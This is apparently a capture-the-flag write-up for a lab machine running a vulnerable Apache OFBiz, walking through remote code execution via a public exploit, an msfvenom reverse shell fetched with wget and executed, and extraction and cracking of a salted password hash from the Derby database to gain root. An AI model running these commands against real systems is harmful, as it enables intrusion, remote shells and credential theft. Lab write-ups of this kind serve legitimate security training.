This is an Ubuntu machine running a vulnerable version of ApacheOFBiz (CVE-2023-51467 and CVE-2023-49070). A PoC is used to attack the web server running on port 80 an get initial foothold. The root password hash is found in the file system in base64url format.
The exploit is supposed to provide direct RCE when executed against the host. We will test if it works issuing a ping command.
> python3 exploit.py --url https://bizness.htb --cmd 'ping 10.10.xxx.xxx'[+] Generating payload...Pickedup_JAVA_OPTIONS:-Dawt.useSystemAAFontSettings=on-Dswing.aatext=true[+] Payload generated successfully.[+] Sending malicious serialized payload[+] The request has been successfully sent. Check the result of the command.
Once we have verified the PoC provides direct RCE, next step is gain a reverse on the host. For this, create an msfvenom payload and serve it with a Python web server. Also, start a listener on port 9000.
> msfvenom -p linux/x64/shell_reverse_tcp lhost=10.10.xxx.xxx lport=9000-felf-ax64[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payloadNoencoderspecified,outputtingrawpayloadPayloadsize:74bytesFinalsizeofelffile:194bytesSavedas:shell> python3 -m http.server 80
Now use the PoC to download the shell payload into the host and execute it.
> python3 exploit.py --url https://bizness.htb --cmd 'wget http://10.10.14.137/shell'[+] Generating payload...Pickedup_JAVA_OPTIONS:-Dawt.useSystemAAFontSettings=on-Dswing.aatext=true[+] Payload generated successfully.[+] Sending malicious serialized payload...[+] The request has been successfully sent. Check the result of the command.> python3 exploit.py --url https://bizness.htb --cmd 'chmod +x ./shell'[+] Generating payload...Pickedup_JAVA_OPTIONS:-Dawt.useSystemAAFontSettings=on-Dswing.aatext=true[+] Payload generated successfully.[+] Sending malicious serialized payload...[+] The request has been successfully sent. Check the result of the command.> python3 exploit.py --url https://bizness.htb --cmd './shell'[+] Generating payload...Pickedup_JAVA_OPTIONS:-Dawt.useSystemAAFontSettings=on-Dswing.aatext=true[+] Payload generated successfully.[+] Sending malicious serialized payload...[+] The request has been successfully sent. Check the result of the command.
A reverse shell is received on the listener, it can be used to get the user flag.
ROOT
From the low-priv shell on the host, let's look for clear text passwords contained in XML files the filesystem, particularly in the /opt directory, where Apache OFBiz is installed.
Some SHA hashes are found, none of them useful though. Next step is to look for password or hashes in the binary files of the Apache OFBIz Derby database.
> grep -E -i -a -o 'password(\W+\w+){0,5}' /opt/ofbiz/runtime/data/derby/ofbiz/seg0/*.dat
This command returns a hash contained in the file /opt/ofbiz/runtime/data/derby/ofbiz/seg0/c54d0.dat
Reading the java code, we can see the hash is structured as: $SHA$ + SALT +$ + HASH BYTES. Also, it seems the hash bytes are base64url encoded.
Base64url encoding is just a standard base64 encoding where URL-problematic characters, such as / or . are removed, so the resulting string can be used in URL's.
To obtain a crackable hash, we have to revert the process. First we need to restore the URL-removed characters, and then decode the result using standard base64.
Transform base64url back to base64 by replacing _ with /, and - with +. The resulting hash is this.
uP0/QaVBpDWFeo8+dRzDqRwXQ2I
Once we have the base64 string, we just decode it and transform the result to HEX, the final hash obtained is:
b8fd3f41a541a435857a8f3e751cc3a91c174362
Final step is to crack the hash taking into account the salt :d
> hashcat -m 120 -a 0 -d 1 b8fd3f41a541a435857a8f3e751cc3a91c174362:d .\rockyou.txt
The resulting password is used to su root and retrieve the root flag as superuser.